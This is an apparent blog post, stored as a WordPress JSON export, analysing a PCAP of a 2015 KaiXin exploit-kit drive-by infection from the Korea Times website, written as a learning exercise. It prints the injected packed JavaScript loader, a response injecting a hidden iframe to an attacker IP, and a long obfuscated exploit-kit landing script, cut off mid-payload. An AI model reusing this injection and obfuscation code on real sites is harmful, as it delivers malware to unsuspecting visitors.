{"id":206,"date":"2015-10-16T16:51:08","date_gmt":"2015-10-16T15:51:08","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=206"},"modified":"2016-02-23T21:55:14","modified_gmt":"2016-02-23T21:55:14","slug":"malware-exercise-from-threatglass-2015-09-20-www-koreatimes-com","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=206","title":{"rendered":"Malware Exercise from ThreatGlass (2015-09-20 www.koreatimes.com)"},"content":{"rendered":"

So while waiting for Brad to come up with his next exercise, I figured that I would do some lab work “independently” while I waited. So I went over to Threatglass<\/a> to see what I could find there. This one stood out to me being half-Korean and all so I figured that I would try my hand at it. The one that I used is from the Korea Times website<\/a>. There you can find the PCAP and the screenshots that Threatglass posts. <\/p>\n

One thing that I wanted to note here is my lack of knowledge and understanding around how to decode\/de-obfuscate code (or how to RE binaries) when coming across these infections. If anyone reading this post (or any other of my posts) has some insight\/resources on how to decode these, that would be great. <\/p>\n

Some links from smarter people than me looking into this EK:
\nhttp:\/\/www.kahusecurity.com\/2012\/new-chinese-exploit-pack<\/a>
\nhttp:\/\/www.kahusecurity.com\/2012\/escalating-java-attacks<\/a>
\nhttp:\/\/malwarefor.me\/2015-09-20-kaixin-ek-from-korean-news-website<\/a>
\nhttp:\/\/www.malware-traffic-analysis.net\/2015\/01\/31\/index.html<\/a><\/p>\n

The below write-up is what I found from this infection. <\/p>\n

– Date and time of the activity.
\n> First Packet: 2015-09-20 13:09:23 \/ Last Packet: 2015-09-20 13:11:18 \/ Elapsed: 1m:55s<\/p>\n

– The infected computer’s IP address.
\n> 192.168.56.10<\/p>\n

– The infected computer’s MAC address.
\n> 00:20:18:eb:ca:38<\/p>\n

– The infected computer’s host name.
\n> alan-1fd4b27f5d<\/p>\n

– The infected computer’s operating system.
\n> Windows XP \/ IE 8.0<\/p>\n

– Domains and IP addresses of any infection traffic.
\n> 74.114.48.134 \/ www.koreatimes.com (Initial infected site)
\n> 133.130.90.152
\n> 199.188.106.162
\n> 61.147.67.180 \/ count2.51yes.com
\n> 142.0.137.70:803
\n> 142.0.137.66:3201
\n> 142.0.137.69:805<\/p>\n

– Type of exploit kit(s) was used.
\n> KaiXin<\/p>\n

– The root cause (what is the likely cause of the infection noted in the pcap).
\n> From what I can tell, the infection of this user stemmed from a drive-by-infection from visiting the Korea Times website. There is a malicious Javascript file that has been injected into the site.<\/p>\n

Notes about the investigation
\n=============================
\nSo the initial infection seems to stem from a malicious javascript file that gets called off the main site (mentioned above under the root cause). The script, as you can see below, seems to have a function (p,a,c,k,e,d) and is doing something with it. At the end of it, we can see that the IP address of 133.130.90.152 (granted jumbled up), and also a ‘write’ to a file called ad.gif. <\/p>\n

\r\nif(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='hello=Yes;path=\/;expires='+expires.toGMTString()\r\neval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c\/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(\/^\/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\\\b'+e(c)+'\\\\b','g'),k[c]);return p;}('4.5(\\'<0 6=1 2=3:\/\/a.b.c.7\/8.9><\/0>\\');',13,13,'script|javascript|src|http|document|writeln|language|152|ad|gif|133|130|90'.split('|'),0,{}));}\r\n\r\nvar arrTopmenuTab = ["topmenu_01","topmenu_02","topmenu_03","topmenu_04","topmenu_05","topmenu_06","topmenu_07","topmenu_08","topmenu_09","topmenu_10"];\r\nfunction setTopmenuTab(tabid){\r\n\tfor(i=0;i<arrTopmenuTab.length;i++){\r\n\t\tvar pi = arrTopmenuTab[i].split("_");\r\n\t\tvar num = pi[1];\r\n\t\tif(arrTopmenuTab[i]==tabid){\r\n\t\t\tdocument.getElementById(arrTopmenuTab[i]).style.display = "block";\r\n\t\t\tdocument.getElementById("tab"+ num).className = "naviON";\r\n\t\t}else{   \r\n\t\t\tdocument.getElementById(arrTopmenuTab[i]).style.display = "none";\r\n\t\t\tdocument.getElementById("tab"+ num).className = "naviOFF";\r\n\t\t} \r\n\t}        \r\n}\r\n<\/pre>\n
\r\nGET \/ad.gif HTTP\/1.1\r\nAccept: *\/*\r\nReferer: http:\/\/www.koreatimes.com\/\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident\/4.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: 133.130.90.152\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nDate: Sun, 20 Sep 2015 12:09:38 GMT\r\nServer: Apache\/2.2.15 (CentOS)\r\nX-Powered-By: PHP\/5.6.8\r\nSet-Cookie: naver=naver; expires=Mon, 21-Sep-2015 12:09:38 GMT; Max-Age=86400\r\nContent-Length: 91\r\nConnection: close\r\nContent-Type: text\/html; charset=UTF-8\r\n\r\ndocument.write('<iframe src=http:\/\/199.188.106.162\/index.html width=1 height=1><\/iframe>');\r\n<\/pre>\n
If we take a look at the file ‘ad.gif,’ you can see that it is clearly NOT an image file, but part of the infection chain that makes another call out to another site. I have a hunch that the script above is writing the IP address and naming the file ‘ad.gif’ since we can see the phrase “document.write” in the ad.gif file.<\/p>\n
We then see a GET request for “index.html” which is located on host 199.188.106.162 as you can see below:<\/p>\n
\r\nGET \/index.html HTTP\/1.1\r\nAccept: image\/gif, image\/jpeg, image\/pjpeg, image\/pjpeg, application\/x-shockwave-flash, *\/*\r\nReferer: http:\/\/www.koreatimes.com\/\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident\/4.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: 199.188.106.162\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nContent-Length: 15197\r\nContent-Type: text\/html\r\nLast-Modified: Thu, 17 Sep 2015 11:49:21 GMT\r\nAccept-Ranges: bytes\r\nETag: "dc8f66e43ef1d01:246"\r\nServer: Microsoft-IIS\/6.0\r\nDate: Sun, 20 Sep 2015 12:09:34 GMT\r\n<\/pre>\n
It is here that we can see that the index page for this site has some encoding within it. I am not exactly sure what is going on here with this site and the encoding that it has. Below is the code after running it through JSBeautifier<\/p>\n
\r\n<script type="text\/javascript" src="swfobject.js"><\/script>\r\n<script src="jquery.js"><\/script>\r\n<script type="text\/javascript">\r\n    var apple = deconcept.SWFObjectUtil\r\n        .getPlayerVersion();\r\n    var xmPpPuD =\r\n        '@@@@@@@@@@@var@@out@@str@len@charCodeAt@@case@@c3@length@@if@@@return@@@@@@0xff@@@c4@sum@break@while@fromCharCode@c2@String@c1@char2@nbChar@0xffffffff@mx@function@do@AVgHbu2f@X3cQCMIIF@ErTiUlaxlkP@@delta@char3@str2long@@BMOYPRD4H@join@0x3F@for@@@@@@@@@@@vl@key@itVm_snY3@false@nbencode@sl@nbcode@KEY@NtCion@long2str@GIEMslIELDjE@utf8to16@FmWtXi3u16JALRAit1VuGOcq1pnWFYOb7OmMGe3@I5uSvjBjGDm4akWvC7vE4FIPZcu6z2fYMOqc68Q0dz5sjdPRu3ngW7RgHVWTPp22yVVFeCep7q6KBpNfPk4GJaW@zsS@Jm3e8CVO7Xf0c0BmpOn9HFqaZYswP5XJXBesNvIjrqGcIj7yAXnPToAiXOxFqakm8lQykAdEwlsU2sHQHI@IsIoFAqAlqJm6m3CPorXf7vkbyWaShaUpBA5RS6eUIOB0fOl4rPxlhqBPBeE0ZW@uOCsQvnx2GZkl06ZioJHsgjBDYcFmnSVKDKp8WVT2M8rIJBBb2GWxo@ygyYporSSXKHx@HmWA2@3zc3m@LFx2LryagtoOY8MHUQpLTB1@6cCGOC1MpEAOTKB@3qkTqkru@iUK@rmYeJ8JJwghNwE1qYgSjpV5xqMSGtFq5P5JlZGffTE2cc2W96EwsvFA0lbOsnK21Ia@p66D9pEPvd68UuGxO8VLGKLOWbqSkoIUbAgFojvvQoBnVGsma6sNqytBaW97ZOpx1qF9bI45jdj@g0fhfx4XwsGwO4bU3Hn5vBhiKFSOERwuziuKuxWVgLKVbqcRUEcnWVZ3Zw0N6rH@ZYt@ndnDlpNRUI4mcIYrUOhRtDG5gIClZk0iBqG7i2w@eW@anujEum6E86HHg1Xq4aYMeTb5xICsS6rkMLfpiEUHozSWUqoul@zE8GRRtnef8v0uBh@9Q0GcVqTAVldv3GrqOPWTifw0@RKJ4@K07t0dVBSDtAY@pKWpUkdx2lDD1VUJ6meoLt4YfOl9DmUAVIV08FrCYa4I@oKS08Vzj4nCG67mVeCKNDJEx10vdnDm9T8SQgbQww8a6k4i0Msw16UikCvhOBNvnh1E@7T3OqmwoGUt628DTj4HIx@MuO5oKOoTpyY6RwHsS@19cpZfhHTiu8D6NqJjrf4RonpqeVkUEFIrV91TxhXbvvNYDYYwa8w9cgcKpu2MEi@0x30@0XF@sbnQyJdSaki@B5@NSHcKQnEjJ6WgB@OlH5nFbw3DcjPnyFVmiksqo7ZtgtcAhY1DTyjNiGvCo@0x3C@RY83JK5zEG@6y3SPr4PX6TNZ9JuYpXRapTE4LFTGqR4t63eba3EsFNwSXudASiQCEHQzdW9EgnnrZKRlgfnovfV10x2@Um5yejLHtmIMKfRoUDMexMzN5zgX98@FlevI7fA3i1b7iL1b059uI7SW4fnkXHs4K2HHiS9ONR8wr037@@@@@@@@@@@else@0x03@substring@BevYWcxoY7k5Pf4SKKRMJHi@1DN5HcYZpUUNPult3efr40@h2HWvX3apY5sTpVm1yMy8Z9Fy68Dl0rk4LROh@No1zZCRS1oxtLKGBE7GTZbhyrnc02z8TmTZDGNWnxKq0It1Tc8jlp2aqqlxQmc2zKQUQDyltS13fDmNG2xDSatLna8xp4jabrOyg0mUDNFqGOwEerBZl@HphoWGLup9q8@9nVTn@2gl@OCu2iAZIS1lP@CD5L2rEcQwn3WXwRmalHFI7wxSOzxKJsNL8A8lg@luh9k6qkxK@ED5SeYLJdBZS4YX0gkvQiRFPpcaSQuIsHQooQs4BjodBMQCvsjppmsa2D5Ukuqmj4Td98MpIR5JInEyiXJ2mVR9x1lf@AnzT@ssSFTy@owHsk4HUPnpQlzth48I0@hUuszuzVXufuTeHLYiFxctucWZRy4Rh4ItZn7vIzelht5WrVRnz3ScR6lVWG0O21ZBGyvbqqfnBGOqaShsKcCEpt3JtEjRgOEx6sLwZsRP3NmIr1U0T8ntGr1RWVIa4hxzpzVqgesCHBkpxKIcZtLsrum4FP5F3MX@ZMUIsyYsdB35mRgqfHmCvvpq@S6HtjJhgpOBhdqNB90J2BNLfc3@0x0F@IareqmUBdTZcfBVZYScBMauOESkhe5vhkP@Tz4GUtkRD0TqtLP5Okxq0@UV@knt@3PtGYDitKEwwIxNSZjUpTy@Ksm9ejtXVpMEwct8NGDXSGI9QXgRNjJiLZpk1b@1x8SfNRL0oy4Ate5ull2AWanuMpSRQNGDZDDnBeIgV1VxDI00DqFfLuwqOlvHJadzH@VqgF@Q068hGTsorOvKc0OwbN192kCpFsk4qZ0MfPpZRhp8EHFkW3JL7bzoUkuuWXvVFo8rYZD4Ild8ejPlNo6Rdc22LtyF3U3lr5DtEuwP0p5U7qmObiu3YngySBEDoWwrILkZwLAHdf93IXEScHeuqdmEFlcqIQ0u7@iFoWk@8dPsKWVlNXs1USGUP94QBOXVEjrt02Zfq57k7PnjUZsZr1LtzzcMLZxWKPcTLu9JqtJaHNQnzyAujFbvEnrquXK4snlYbBP6jcZYR@3HxLYu3wLgXkXz41@IugkP6Pf@vqK4e9lmaOC6HaHFRCYQL4Kxw2ObnTOcEKiXpw45odIGZSbkkOCeF7O@DqxVZGiWISitOF5tjEx0gGlV1yUCzgAQandpTnQmhXHeHNsJl@ldtUEyUMeaatzTEDeyHwdAKA723om3zNrEtxSeeLA@qrG@mCZ2wJNfyHnoXYVppSztIQnVRjDlVENikBdflZd8N@qecaVnjxIpAld@RinES@vKgdgK9dq7Vy1pDLIIe0TnqMd@Nxif7fJXVz5706G0449FJOk@5DlWg3xLW4I3FXz3AJ0giDniJqp5ehRj1jBkHLcWUxPGuj072no@N1HbMJbfj@He5A@pp2yusy050wKNi8XO7UpU6gTr6yA8Ny@3cnFiah1S2SSmnRsuW5Re4elKYgKpVjJjc4iMlAqJmTRvH6@Edovo@cWlhtP0JpPPNoXvt1GSRkVtK1ZagnWNjR34uIDAm0pvUHE6j6sZ7UtsrI2bSh0eX3zzmdZVCTgRfxO2xIunZjaZpOnGPC@RCjFHSKxrMqca2CduqzChOfwuG3hRZ4O@zarOUkprMGUGIeTok22LirucaEHWugINci4SBCFP5@@@@@@@@@@@n5tl4cbAGvJ3xhgY@8L3ns5gXQXUl8yZnl0BwdpZVdhmQofpkZBhK7wOHpqbOiS5eRkDSQmVKzPiXKWqnsKhdxYQ7@qqrQUW9YkDNtMdEQEXe6q0riclA@RmINzYgv8hOsxoy8oO@dRYvylpGwzRjLKdDKtBlwW81eTy5EXKwHF7CsvN04XM4@ArAc6No8wlSrp0SPUgnIzfmCd7Gxz57eRyK7twsIuoEPqU5cD3B@nOwwtnC1hNObpuB9OXwCpJtiS3ylVcKAwUyL391ghGk0aO@Z6lILRKuX4WMEvM06GwPAoiAjirx2mVylUBhZGGvAaOK@5h302EHBX5EGCNhvDCm8zaEvcmCOUJsG@eSs@0jf6zE6lFFFGeorzoUfKq0p59eTlUryjq17cB55vRuVQVhMaGyydsj1S16iQmJmHTqHnwCZyKQmJNKccGslaNWI4d@sB@OqW9UnXO0lnc8pHWEydfpg@AHXx7fuTljuqHmoOjOKItkqUyJjitxxAs@Ymb2Qrl@hPyzP@j7W4Ybd1kT2TyWmtAdT6I5rIA6g2kpMZFqWpkzUNoLaUdbY5Bs@Ha7xGcz4t5AFkljpZrmgQzebrge4XRRw8@EmwHD7QCHjCW@x6YplsoPxHvVbDpxYiBnbJox54zQI7ePdAX13wR5eQMcY8wc9FQXVQNcHWMW3MR5jn9zKMVOIdVhOAdaz3t7Hy3QVTncycAayro4YepJ9h@3peG0dT9HBTDXHK1kcBIaMAM5@rluQ3Adryp3baZo6nkitaKUbekuhnFgQ3i0pJDet1EgZ9DVzbLIsgz3PyRuKgVXjYvy2b@pjoBrwMiZ@yyte1eqwB1@4D8WyAwP2ZZ77DM19zP5dAcOsJlTGPNFf@omv7@PdyzgEg0axRvyAU@Y9@0UUm@fSaB53@XNE8VpxWSH4V3gNL6JH5HyWuDbog@LidFYDpaapr8dtgu1OKRVZesZKuRtnAGQ5tKCZRGWmgqyhOHY14KJp1k4I88KIWvR8VJbF2LmICxKsWtQZGm56h11E0Q6xYkAcrQfFld@new@0x1F@@charAt@IfkQVVHiY@YhDY@L9PnmQPLJ2uqeAuNtNrw2VZJSxnzSPIPBwmuJ5jSBk367ZDW3BQk2qhkWz6uzN5YUa1skkJWS41@switch@6okHOx4rgZk6HKWp@tjZ@ewJ@w6weJaFKj24gkdM7QtjWYja5451@2wW5fCdwrK5gmRw3eMFxHextoohoEKxfwhqwlkZBQ5alFL63OGkagqnNKU8FfqJnml7F6G@5Vs2x1aBBOlaEPrBNG9cZeqEVEDJquEH@4hr@kPARABNuSRNxHKk2V@bBtZPvPYV1AxuyyjCde05XPg0dQAr6E@mzwMyN9vMDdmovVyiZU1Z9j5DSjPcZXvrkJl@R3YusX@6V9xE3CjmwqLWycWp4MzjT9ltpMlUC6lS9QopLhQDJJIfUcn8xv@@@@@@@@@@@4Rmd@SWirEqq4FW75XSmOyaItFwMXzq2a3fGHzJg@3ieEVLtjC9iDxdIGOjP8H6uWp9HnEFnYNA2hs17@s4mpSUZ1LHbJR3H3bwLiapguRsgHCZdCsq87RIPpHCofP8uS0NvjX3F0RaZwFKireD0MVCivWS7ej0lbcWrw5hdBRIWclxt@mNlk@fBU@PG@SWatpVgVpcQWUhcq9aR4tzgPNYbIlTOHj5Sci39OR@v0fgsJGXZmum0S56wWQXfZlcbQvhEReMocAqhNUs4p3l0usR8FNyoSSQg1RChokoiQq@iW55UwhKDK7lUKZd8ntjZAsCXBU0CeyjDvP8eLbDI1p9VzejL0vk1nhl@4HoqpBEFzEtpvdNTga8CUb5CbEVGodUrXbFBdGEkskoaZsQETUP11l3deUay7xtz8hQx@igB7ZXHA2wbAgp1bkRzToPlHMBNTNzDywi7EIeDev2geFDZLH2vWt1a11cAc@Array@Math@1ao7wvZ8y5NOQ38cET77TRTG@DbJFBFDBTE0EquHPIvMjVvjHCOdq4QTsK25cEDdFS3ZlQPXaDMnyu7YU64H7g6ZdqPZFOozMGGTvsErbERy7HOaJzn@K1yvXCn54g2KmgJF@Xm1ppIVHcXHEeNnGSfJeFFamjXkxeQrX6vIIHFypc7UERD3wM0xheG3lLgSb0GoWdbhf0@pUxZYKYC0fgZXoEsU1Z6FOVns7iOCBfLXzeZ6CpgpWUzJF0ckhLABirit56jLpwGpgtFEZJNW7l1Mnn2r6gZT@JDxL3m43FXnXIl0CJlJzl3w@lY9uwcT4@ZvUFV0LstrRHhv9@sDdtMBHiloNuFD2RC@er7Kta11iO2pDceym1aC5hEhSfeD3mIbsqBBUnksjnx73ZXGwpYuCWsX3tMZQDLr@zsSr4bIkUPeu@VMkXDB2v6MvpW@zDECT2cwXdqSlu4Y7hRl9AmNBJOq7LjKhcCwCR4cbd@jKS5H7hV@iMJx7Gy4HPQqoMOcS2@54P4gxaC1iDXgafaI6ga@a6MnkGqOQ1M9jrlaApQ3WCW7WPpHZjb4ImTi9YUeCA3aX9zKZNlJeL4fu0fG0vXApvexe8ZpaQAJROi0ZGSz20hwiAmjQWhFuBek@PMNDBmkUXN2mSqszSviYTycw@UuPmEbyjQ1P1DNrBOq0rrGnEJjwvZzB35zYxN1WQH7nwudjzR8JkXnja5lyeMVAmbCa6cbENe6Q1ZO8xHDFzmaUOOIzPVKwgVp@SPePYgA541JIUivg1gIDKd9GZw4rj11MlIkrE7hxxkaEVBGiPolXj8LWMyW1svqSv5qKoaOp5MILJCNHEpjzyTsCfMsMzrdLTSt6FveEjJkL86ptb6itebUhcKcIMnGCijcsZUyfFWY@QyzmprPokQpRao2BSPz1wdV95E6TFeLJNyGmpmHBTTp82F@xcUypLyzQzYKMUU2BelnZ237g2qbOI3z9HLdojtYd4O1Bqm4xmjKmUPj1eHu44Cqqo89PlTlIAe3C@YG2UzwLtwQu@0TYTkSNjY7OyPMdpSyKXrAVHMkJ6M1iLuwGRrdpy85VGfK@nWNt7TRSEYQ1d1bsbxid19e5iD2o4ZVDo9Cfsu5nwDWJCTVNGk9BVlr7ggGMmHC4gbgFt@12MroXVMvGX8cOy9eQRIZWbYcZaN4v8Rq5CR8Qq49KOay@ByFqJxBYYw1sHH7A5fcPC75Oqlw9DMhD26f70tsw9GBEfr@ynBTuuf0FXgo8fqNyfs4fY6FZSwU@enwryCENa4oKoLGIgNZAm@3dJpvrGxQMcJk488DonjAZViZcUiAxv6WWCXf@lbFtqY27NWM6R2Sk53S6ZJ8lIWGFiFnOmaOjNrCdM8fjN3Y1KPFuq8GyaI8stG1NRfSJznqtlzfYoMCUeDmjW4fUYJYk5JTVqsRCZZT2vD1VV@9BfqkIDGXOjcT303Vaz16MUqfV7LphNXwN@N0ZVDTqSHVcrEXdKxaS@6CpE@iwFahWTUQSm7cqhM7@lfFS3IyGiFZ51UWWdRTpzyfv9KXOtiAHMcvG4yM6RIy2y62IYKBOozAIMvNSoibzGbKLbNTuSLqPH2hUb9i4z5I9ubEtIQdu@LH8H4Af5ZirbJLhkGkrImeBaTS@a4clsnnsIVeVYmgjFeDp@@@@@@@@@@@lNRyM1VgHBuFGKYp@Fq7iBvScBn1ts3Sg4X7eub4rC5CAO9ZJg2kXWIBy5vbZt33zH06j1pPABDNoNgBa34@TgGdy1BeURvRTx6Co977FKzc5MSpx@cDBwOKZM85a6UMzApK6S@Ei4VVKBJN6@gFn2@b5EwfuIHqX1trSRYo2qL4hge2E9W0DDlCCMUS3QK@fvFUxMLQ3TjSNQpEymGXSOoYxO5mchG5yxrrBgQfjM7hBMUL0fea3U8vIBgpj0UUePSR9M7qSgIQuoFz6VgNnfFniLoOwUIIMIakqGceY2VzyTCrCnHRnDjuLsE3aWxGiNVO4L0@FoGBa0jTEvFUei9Cooa0WKu3Ob3fimDbM8YETwocbauQJe@CbNrIlFKdLjuROp@D7BRytQTCAH7wdJvoGUI7CEjHCu2WwEHi@ayhin7@EWiS@Lt41@C8AnH0ZGOAT@78wnghvZSmxORrtqIF2zINjd8u6pwC@eval@b6sX@VRwNrOD3ERf4zYB1ZdCf3aQOhm2SVPI17QFYIdUsfO5b48bBPhIO9Rm2jdONfAkjlYlHsmXQUanN4ohWYeGFEzrpLb6Rl@ZRv@iYk@window@Lk@pau1Cuzkt7@BzHLQiCvWXc9KxmfqZVTdi4OtyLh2Lysg@SpOFZNynebCvZpPntXBFzm3b@xHUy5kcKmiphhUsZqaNCLWkgYdmcV4t6L@9e@IJrSlJQyj6DSB6bMsrZ6BOuxLRumXdRWuEObMfxqOuOrS1gvm0g0HAj9nJUBkV@0JUy4lVa1tFUSroOUopZfKz4A6osI6K5nE@tfjPfM10IjsX9stQ7Z@tWISJvyA5A8ipwAq4D9Y6FyRgMkTTbFOhHdk46SyQ1RXh@0NUQChCQow8JXPsbE0SSgrJ@8IZJ@FsuPdFT0Dl1k1RqgcSXJjwk6Xmd3nTugB@KMfAPKHMvsz9tl5nDOJ7BIROmIqV@fVOpZ@5xHMFaY5o9JNWRA1WKrncBVxDVUY1d4l@u1bVs6xWjNCfpq8lvR4FRB@MdHzp9qPXti2CUHiQzQZ@0CpjFtuUSAd5XErOoO@pdqBcu9SfU@r9s0loJXl4@NsvyjGOVZNkrAeItrgqUYx5cd9gSjQABfz3hcKAycL5BniFgjZwIYPeSGKsUIcavGRZjsKpu8g@Od8KV1nuPvRioozbBci2AM55nBchaweiDRAnXqgTRty1ptZpXgBCA1tfCGIWYWVuBtotL18koXCxcm9PHdd50rsadLIRxWrWdT@046e2ii4o8b0ErkO@PAWyeXf9USXoNOVdGXf1EPvkU8YSwoYRpm0HB4rO72m14nvMh8aiZayHBm0rpXHO@O7TiakLo9WTx3@e2fH16e87KHH1Bg6Txl6M8cqKpbb@7loaOOhS9E3DMOTnqfm2vHA@G8z8boxTSy7XYBmSVRHpfu7@NzI4JU@@@@@@@0RVt7@Qde2vAxYbQwteKBSmAFj0fyP0DcZKvMzZd8NCFz4gKcoYDTYmvxTFWqT30lCJUBr0NSqd9fOhvE3JnZ@JGJ@@w3zlzWnkf9j1c8AI37lWDZrGLBmU4LV8MCGIJ@@kV8OwCSZ7YYdYJZ9QtwiS7hffFAr7717j@@@@c9HlnL5jdde3gHtYaNWHdt@TOQO6k76v1HHM4rEXME@jq@HbpOWE28AeruxEqNjZkfDPxoP2eD3ODyla8z0nkd0Gz@sFpu5QYcEupflN3qj7NgWINcnPiXCc56PxEdPYYVSq3McmwOjDbWe6NGgA9JL735pVH2pneD62e6fn8Re67OSAqiCEVg9qZKXpDTeHIcZTXhIXIbQGmpHPJMASLCPTZ7zidj4s@vCl4j6LMssC0PxhG1cJy@eE9cFEDqyYfvrL9p8CAhkECQH@AF2iAzvK3GJpDgDrwf3iFgUOAS5KEzzbb9hHv99hc7hF5N3y7Ey54@M5@XTCaaLBuUsgGit4vjHvtNJHIoOEaHYE1z@qLZRU@UQOXfhYLHaxgXbdCgOWoKnTPAE1@rnYz1JQpUDnL@Ul@H0VYZ@zb27gNZO4u@H25S6hgl5qwz5TrxjU2hqW6Ibggu8@vRRc9H8iwusMjLFDE1w053c85TZ4u7zExQONSlWm96ycZ4GlqNbaUb@oU@floor@qd1tjtGfkrPS@0x9E3779B9@5YfUrSK1t3OuX5ve7yfdD1NFXqRqo1XZDm4TmgoGYsd9e4S@kWBTp@6Ko4AH0dQBXqfJo@BSE0Yb67nBmrPYU65WyppHSWpntOOsT3FRmAT3pcQlxTAf3copDTILtV63HPA@tJZUqZViRnoARCG5tGhaTjMmzL@TFWSnqIHyX3y6662d84fRIYULojjnghNs562vhBviAAN@X3Eom96c6RY2osI1UVuI5eXn07n2G6HVp46fL@7u3tb3NKviZC5cJvZVF60vdT6F5Iy8TIo5pDYJIroDfpB0lhJbMUIxp6egs2ojaSDwcYI@cap@true@iezKVIKYDnqLaIWbwNgDo8EyFkDi2s@fqk3TqBOTeaCQX9pfikpa0GG7NgKotduDt4uEs6AFhs0bTGUUNH37DwJhJlcY0PKryM@5UB@CDof0ua87IEot7fqCqqykTBW3MJVKGNK8HC2@fPyO2ZUO@rgseHoj5FCypffD18DTl5tX67GJR80RJCumDnOr3eyKIsmGrmDfUsViS2QCGfH40ctSX1pLR7Y23AJREmREWEG4ZHJ9AXD5VvzAEejhsstODvZDedQrJcIyBE@SyMxYLvJyFnyoKGhF2G0AK2UZjG0cAqTi1idNttBchuSTFyUjtV9bw3ry@zVVQbnGdjZMfZ@uG5PjnJYESS2M@YfhOKh63q5yu0Jj7Cymp6iu7ZEJuimcAMdd2S0VahftVYZU@nes@4U8ufeULDh86zbacR0f1sY0oGq9vdg31XfnpUmL5HfIhMjAhpig@51nf6UKoynA2CKflEi86C1f3Z9@mW3CCfz8PZIbkRWO@aZ7tjCcsk4MWfBBtWZtJ@dXULOpWN3M3kDE6C0vDkoIKX@@M6GFzLPFW43lJMSSxEmJ0epcY@@@5cxDI4Uxd525ld4WPWfxdM8Sspc5eIW2Y2z9zqAJMUuKcCdfCmYeHxg5F48ENLIJQ4zoB47jUFFWR5BvglCN7vxt6Tb3op1Cpya67ffUpBCa@@FW@tm401jtzQKE8@VpsT4@92l@aGZEjeII6QtVoX9S9k7gCP2U8yaqZxhHOlZr1R@iMFstL9jxuoEOE0wkueQs1o0wDXEP68vJuvi84eS3IHizAv4gnCYtDEsXQ@BGXemTvk8erUVvOKP7QMhZkLccFA5zBkFl2N9xP8ho8S3WIWuvc9mbpf@uhA1qmsVMBNMOF5gtKCxR8JLoQZRcPaFhww@r7k719cXu7MSF6@vu6pqmy1V6UVsOOMciB5QHCzrDvYMT6ydraK9dLLQZN3oyLVBL8zgp6TIFQxVVOVUQSRad4WDPYJKN2H3uwVjuIkstI5C9FD6FhQShc2KKciEp1JH2b7hT1@IqQWp1wAXKsCL0s1QQzIIiOAP6Ndrw1rzprRteN@vPYxylz47vetrPhPa@8b8jf1d82YfnnyAXIUlPtNhjlflLgSxWJHwP6NsgEsNqxdXg7CCvlaWwLBkAo6EWaViUEMw3cPxxuvOAbmAz4dHeesMLolpzqH5HTnEE8zv8Y1LqsnskbMRBNrpOMcSKVMvd0z@Yg5s@SQ6Rd0qMJQVnxDUcX@ZZJaO6Brl87jrQyvenBN5ZtRSyEPyGnA9GdkG74PLAhIzsYF0pNzvc5pLnEAlwOvRbHpwz5DCWZTkodspp4Q@cTxqMa5@dgmWD@j2exaW82FcA4kJ3iIQueBkFsM6O49Bb3fUaawbPgUObwtWhWBr3X@wNIA8qdyFbt3fmzfN1EIEhcLlxHUNCIpkTC1Hfa5t9OEtWGIu@6JvHeOHuAHX82nwxOGQDIhC6CLZRigVT6Em@8YlN0kOQtuLZVLXTllgMtBHfWlF@CbiBKQmBAm9ssBaVwDUxo15HEvF90dWPLbI',\r\n        xmP76x, C69df3E, xmPpPub0 =\r\n        '\\x40',\r\n        benz = 'YcVoEu',\r\n        audi = 'BmPuWv',\r\n        jaguar = 'IzLmAw',\r\n        ferrari = 'LjNsSx',\r\n        lamborghini = 'OmHfLx',\r\n        GTR = 'regedt32',\r\n        C69df3E3 = '\\x73\\x70' + '\\x6C' +\r\n        '\\x69' + '\\x74';\r\n    try {\r\n        alert(a, b, c);\r\n    } catch (e) {\r\n        xmP76x = eval;\r\n        C69df3E = xmP76x;\r\n    }\r\n    try {\r\n        alert(e, f, g);\r\n    } catch (e) { \/*NB VIP*\/\r\n        C69df3E \/*9.9*\/ (function( \/*jsnb vip*\/\r\n            p, \/*jsnb  vip*\/ a, \/*jsnb vip*\/\r\n            c, \/*478188809*\/ k, \/*jsnb vip*\/\r\n            e, \/*jsnb vip*\/ d \/*jsnb vip*\/\r\n        ) {\r\n            e = function(c) {\r\n                return (c <\r\n                        a ?\r\n                        '' :\r\n                        e(\r\n                            parseInt(\r\n                                c \/\r\n                                a\r\n                            )\r\n                        )) +\r\n                    ((c = c %\r\n                            a\r\n                        ) >\r\n                        35 ?\r\n                        String\r\n                        .fromCharCode(\r\n                            c +\r\n                            29\r\n                        ) :\r\n                        c.toString(\r\n                            36\r\n                        ))\r\n            };\r\n            if (!''.replace(\/^\/,\r\n                    String)) {\r\n                while (c--) {\r\n                    d[e(c)] = k[\r\n                            c] ||\r\n                        e(c)\r\n                }\r\n                k = [function(e) {\r\n                    return\r\n                        d[\r\n                            e\r\n                        ]\r\n                }];\r\n                e = function() {\r\n                    return\r\n                        '\\\\w+'\r\n                };\r\n                c = 1\r\n            };\r\n            while (c--) {\r\n                if (k[c]) {\r\n                    p = p.replace(\r\n                        new RegExp(\r\n                            '\\\\b' +\r\n                            e(\r\n                                c\r\n                            ) +\r\n                            '\\\\b',\r\n                            'g'\r\n                        ),\r\n                        k[c]\r\n                    )\r\n                }\r\n            }\r\n            return p\r\n        }(\r\n            'b 